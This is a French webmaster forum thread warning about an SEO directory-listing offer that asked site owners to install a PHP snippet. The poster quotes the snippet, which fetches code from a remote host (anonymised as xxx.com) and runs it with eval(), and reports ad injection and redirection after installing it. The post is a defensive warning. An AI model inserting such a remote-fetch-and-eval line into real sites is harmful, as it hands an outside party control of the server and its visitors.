Attention offre de référencement : hack ?!
5 messages
• Page 1 sur 1
Consultez la formation au REFERENCEMENT naturel Google de WebRankInfo / Ranking Metrics
- mica2006
- WRInaute discret

- Messages: 156
- Inscription: 20 Mar 2007
Attention offre de référencement : hack ?!
Bonjour,
Je viens ici pour prevenir certain membre qui on reçu un mail de xxx.
Le mail vous propose de referencer votre site sur plusieurs annuaires et moteurs en échange d'ajouter un lien vers son site.
J'ai pour ma part tester et installé le code qu'il ma donné sur mon wordpress, je me suis aperçu que ce code redirigait mon site pour les viviteurs arrivant de google vers google search, ensuite de là si vous cliquez sur mon site, mon site s'ouvre avec des pubs en haut et en bas en forme de bannière.
Cela me semble tellement abusé que je n'arrive toujours pas a y croire venant d'une personne comme lui, étant quand même connu je ne comprend pas.
voici le code qu'il ma donner :
<? $ban = implode("",file("http://www.xxx.com/yyy.php?site=adressedusitesanshttp")); eval("$ban");?>
Voila, vaux mieux prévenir que guerrir...
Je viens ici pour prevenir certain membre qui on reçu un mail de xxx.
Le mail vous propose de referencer votre site sur plusieurs annuaires et moteurs en échange d'ajouter un lien vers son site.
J'ai pour ma part tester et installé le code qu'il ma donné sur mon wordpress, je me suis aperçu que ce code redirigait mon site pour les viviteurs arrivant de google vers google search, ensuite de là si vous cliquez sur mon site, mon site s'ouvre avec des pubs en haut et en bas en forme de bannière.
Cela me semble tellement abusé que je n'arrive toujours pas a y croire venant d'une personne comme lui, étant quand même connu je ne comprend pas.
voici le code qu'il ma donner :
<? $ban = implode("",file("http://www.xxx.com/yyy.php?site=adressedusitesanshttp")); eval("$ban");?>
Voila, vaux mieux prévenir que guerrir...
Dernière édition par WebRankInfo le Dim Mai 29, 2011 10:03, édité 2 fois.
Raison: Modération de l'identification, toujours disponible par MP :)
Raison: Modération de l'identification, toujours disponible par MP :)
-

Marie-Aude - Modérateur

- Messages: 11867
- Inscription: 5 Juin 2006
Re: Attention offre de référencement : hack ?!
Il faut voir où ce code devait être mis et comment, car là il y a simplement un lien vers son site avec des mots clés
De toute façon à la base son offre n'était pas sérieuse....
De toute façon à la base son offre n'était pas sérieuse....
5 messages
• Page 1 sur 1
Formation recommandée sur ce thème :
Formation REFERENCEMENT naturel Google : apprenez une méthode efficace pour optimiser à fond le référencement naturel dans Google de façon durable... Formation animée par Olivier Duffez et Fabien Facériès, experts en référencement naturel.
Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.
Lectures recommandées sur ce thème :
- offre et referencement
- Redirgier offre?....... vers action.php?name=offre&.......
- Offre référencement annuaire
- offre de référencement à 100
- Offre d'emploi référencement PACA
- Offre de referencement votre avis ?
- offre d'emploi référencement Toulouse
- Offre de referencement soumission annuaire.. Laquelle
- Offre référencement payant dans annuaire
- questions sur une offre de référencement nat
- Synthèse du référencement Google
Cet outil vous donne un petit résumé de l'état de référencement de votre site dans Google. - Logiciel de référencement AgentWebRanking
AgentWebRanking est un logiciel professionnel qui permet d'analyser le positionnement d'un ou plusieurs sites dans plus de 300 moteurs de recherche dans le monde. Vous pouvez ainsi analyser les performances du référencement pour de nombreux mots-clés.
Qui est en ligne
Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 0 invités


